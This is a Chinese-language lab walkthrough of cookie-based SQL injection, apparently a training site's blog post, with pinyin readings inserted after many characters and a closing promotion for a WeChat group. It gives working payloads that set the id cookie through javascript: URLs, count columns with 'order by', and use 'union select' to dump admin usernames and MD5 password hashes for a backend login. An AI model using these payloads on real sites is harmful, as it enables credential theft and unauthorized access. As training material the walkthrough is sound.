經(jīng)過了我們前段時(shí)間的sql注入學(xué)習(xí),今天我們來深入學(xué)習(xí)一下sql注入之cookie注入
首先我們打開靶場(chǎng)環(huán)境
隨便點(diǎn)開一篇文章
嘗試在結(jié)尾構(gòu)造一下 and 1=1
可見是使用了防注入的,但是目前我們是使用get方式提交的參數(shù),我們將id=171包括后面的全部刪除一下試試
顯示數(shù)據(jù)庫(kù)出錯(cuò)
這里存在cookie注入,首先我們恢復(fù)成原來的界面
然后我們下載一個(gè)ModHeader瀏覽器插件,將cookie設(shè)置為id的值。然后我們?cè)L問
其去掉后面?id的網(wǎng)頁,發(fā)現(xiàn)并沒有顯示數(shù)據(jù)庫(kù)出錯(cuò)了
然后將IE欄清空,輸入
JAVAscript:alert(document.cookie="id="+escape("171"));
這個(gè)語句就是構(gòu)造一個(gè)JS,把內(nèi)容插入到cookie里面去
返回出一個(gè)id=171
然后我們來手工注入一下他的字段數(shù)
JavaScript:alert(document.cookie="id="+escape("171 order by 10"));
可以知道他有10個(gè)字段數(shù)
然后我們里顯示他的值
javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));
再刷新一遍發(fā)現(xiàn)顯示2,3
然后我們來破解賬號(hào)和密碼
javascript:alert(document.cookie="id="+escape("171 union select 1,password,username,4,5,6,7,8,9,10 from admin"));
得出來MD5加密后密碼,解密后welcome,然后就可以登錄后臺(tái)了。
最后喜歡我文章的朋友請(qǐng)加圈子關(guān)注我們,私信關(guān)鍵詞:加群。(送免費(fèi)資料和優(yōu)惠券)
就會(huì)自動(dòng)分享給你群號(hào)。歡迎大家加入我們的安全大家庭。提高大家的安全意識(shí),提升大家的網(wǎng)絡(luò)安全技能一直是我們的初衷和愿景,讓我們共同成為守護(hù)信息世界的"SaFeMAN"。
還有可以關(guān)注我們微信公眾號(hào),在公眾號(hào)上輸入安界網(wǎng),就可以關(guān)注到我們,領(lǐng)取資料和優(yōu)惠券!